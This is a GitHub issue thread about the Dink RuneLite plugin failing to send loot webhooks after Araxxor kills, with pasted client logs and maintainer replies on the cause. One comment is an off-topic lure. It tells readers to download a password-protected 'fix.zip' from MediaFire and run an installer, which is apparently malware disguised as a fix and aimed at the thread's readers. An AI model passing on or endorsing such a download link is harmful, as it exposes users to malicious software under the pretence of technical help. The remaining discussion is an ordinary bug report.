### ISSUE TITLE
Araxxor Loot doesn't send loot webhook

### ISSUE THREAD

**Issue by DanbisDev** [pajlads/DinkPlugin#529]
### Checklist

- [X] I'm reporting a problem with Dink
- [X] I've searched the [issues and pull requests](https://github.com/pajlads/Dinkplugin/issues?q=) for similar looking reports

### Describe your issue

Steps to reproduce

1: Set up dink to any webhook
2: Kill araxxor
3: Verify looting araxxor does not send a loot webhook

### Runelite Logs

![image](https://github.com/user-attachments/assets/80aeff34-b980-4b20-bb02-38c05b4ae32c)
I am on windows and this is the message I get trying to follow the steps in step A. 

Here are the logs from step B
2024-08-28 10:57:59 MDT [Client] WARN  n.r.client.config.ConfigManager - multiple matching profiles, choosing RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.7-GSL7Uk), ignoring [RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.EYxoKl7_)]
2024-08-28 10:59:37 MDT [Client] INFO  net.wiseoldman.web.WomClient - Submitted 1 name changes to WOM
2024-08-28 17:43:03 MDT [Client] WARN  n.r.client.config.ConfigManager - multiple matching profiles, choosing RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.7-GSL7Uk), ignoring [RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.EYxoKl7_)]
2024-08-28 17:46:09 MDT [Client] WARN  n.runelite.client.eventbus.EventBus - Uncaught exception in event subscriber
java.lang.NullPointerException: null
	at com.pathmarker.Pathfinder.pathTo(Pathfinder.java:274)
	at com.pathmarker.Pathfinder.pathTo(Pathfinder.java:292)
	at com.pathmarker.PathMarkerPlugin.pathToHover(PathMarkerPlugin.java:416)
	at com.pathmarker.PathMarkerPlugin.onClientTick(PathMarkerPlugin.java:1154)
	at net.runelite.client.eventbus.EventBus$Subscriber.invoke(EventBus.java:70)
	at net.runelite.client.eventbus.EventBus.post(EventBus.java:223)
	at net.runelite.client.callback.Hooks.post(Hooks.java:202)
	at client.ko(client.java:48799)
	at client.hz(client.java:3431)
	at client.bp(client.java:1095)
	at bx.az(bx.java:366)
	at bx.kj(bx.java)
	at bx.run(bx.java:22397)
	at java.base/java.lang.Thread.run(Unknown Source)
2024-08-28 17:46:43 MDT [Client] WARN  n.runelite.client.eventbus.EventBus - Uncaught exception in event subscriber
java.lang.NullPointerException: null
	at com.pathmarker.Pathfinder.pathTo(Pathfinder.java:274)
	at com.pathmarker.Pathfinder.pathTo(Pathfinder.java:292)
	at com.pathmarker.PathMarkerPlugin.pathToHover(PathMarkerPlugin.java:416)
	at com.pathmarker.PathMarkerPlugin.onGameTick(PathMarkerPlugin.java:1217)
	at net.runelite.client.eventbus.EventBus$Subscriber.invoke(EventBus.java:70)
	at net.runelite.client.eventbus.EventBus.post(EventBus.java:223)
	at net.runelite.client.callback.Hooks.tick(Hooks.java:220)
	at client.hm(client.java:17068)
	at client.bp(client.java)
	at bx.az(bx.java:366)
	at bx.kj(bx.java)
	at bx.run(bx.java:22397)
	at java.base/java.lang.Thread.run(Unknown Source)
2024-08-28 18:21:29 MDT [pool-3-thread-1] INFO  n.r.c.e.ExternalPluginManager - Stopping external plugin "class com.xpdrops.CustomizableXpDropsPlugin"
2024-08-28 18:21:29 MDT [pool-3-thread-1] INFO  n.r.c.e.ExternalPluginManager - Stopping external plugin "class com.portaguy.ThrallHelperPlugin"
2024-08-28 18:21:29 MDT [pool-3-thread-1] INFO  n.r.c.e.ExternalPluginManager - Stopping external plugin "class dinkplugin.DinkPlugin"
2024-08-28 18:21:29 MDT [pool-3-thread-1] INFO  n.r.c.e.ExternalPluginManager - Loading external plugin "thrall-helper" jar "cTUAI2NrgrHGl6iHCtoLsGqwuYVMp13AYMTGK1jvtIQ"
2024-08-28 18:21:29 MDT [pool-3-thread-1] INFO  n.r.c.e.ExternalPluginManager - Loading external plugin "customizable-xp-drops" jar "KsfMNAa3unYfLrTv9i0D8-XPmTlA0ZNzxG0PT4nNp80"
2024-08-28 18:30:18 MDT [pool-3-thread-1] INFO  n.r.c.e.ExternalPluginManager - Loading external plugin "dink" jar "ik1rYaYxmAb5Lan9goOclW96wr0anTKV94FD5e5JcqA"
2024-08-28 19:05:40 MDT [Client] WARN  n.r.client.config.ConfigManager - multiple matching profiles, choosing RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.7-GSL7Uk), ignoring [RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.EYxoKl7_)]
2024-08-28 19:05:45 MDT [Client] WARN  n.r.client.config.ConfigManager - multiple matching profiles, choosing RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.7-GSL7Uk), ignoring [RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.EYxoKl7_)]
2024-08-28 19:06:14 MDT [Client] WARN  n.r.client.config.ConfigManager - multiple matching profiles, choosing RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.7-GSL7Uk), ignoring [RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.EYxoKl7_)]
2024-08-28 19:06:19 MDT [Client] WARN  n.r.client.config.ConfigManager - multiple matching profiles, choosing RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.7-GSL7Uk), ignoring [RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.EYxoKl7_)]
2024-08-28 19:07:13 MDT [Client] WARN  n.r.client.config.ConfigManager - multiple matching profiles, choosing RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.7-GSL7Uk), ignoring [RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.EYxoKl7_)]
2024-08-28 19:07:18 MDT [Client] WARN  n.r.client.config.ConfigManager - multiple matching profiles, choosing RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.7-GSL7Uk), ignoring [RuneScapeProfile(displayName=Danbis, type=STANDARD, accountHash=-8743979790910692881, key=rsprofile.EYxoKl7_)]
2024-08-28 19:31:30 MDT [Client] INFO  net.wiseoldman.web.WomClient - Submitted 1 name changes to WOM

### Runelite Version

I don't have a i icon on the sidebar. Maybe cuz I'm on jagex launcher? Sorry reach out to my discord if you need more info danny0897

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Felanbird** [comment]
The RuneLite loot tracker does not yet handle that boss, we completely consume it for loot notifs.

**Comment by DanbisDev** [comment]
Thanks I'll close the issue since it's a problem with a different plugin and not in your hands

**Comment by iProdigy** [comment]
actually araxxor is a bit special like the whisperer, so we will need to make a small code change to consume runelite's loot tracker event (which isn't fired until they make a new release)
